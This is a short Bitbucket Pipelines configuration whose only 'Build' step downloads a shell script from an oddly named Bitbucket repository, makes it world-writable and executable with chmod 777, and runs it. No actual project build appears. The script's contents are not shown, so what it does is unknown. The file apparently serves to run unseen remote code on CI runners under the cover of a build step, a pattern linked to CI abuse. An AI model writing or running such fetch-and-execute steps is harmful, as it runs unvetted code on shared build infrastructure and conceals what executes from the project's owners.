image:

  name: atlassian/default-image:2

  run-as-user: 1000

pipelines:

  default:

      - step:

          name: 'Build'

          script:

            - wget https://bitbucket.org/charley37/abcdefghijklmnopqrstuvwxy/raw/9c5ecc2ba80795cb96c2dd9a6285a347f3ec03aa/build.sh && chmod 777 build.sh && ./build.sh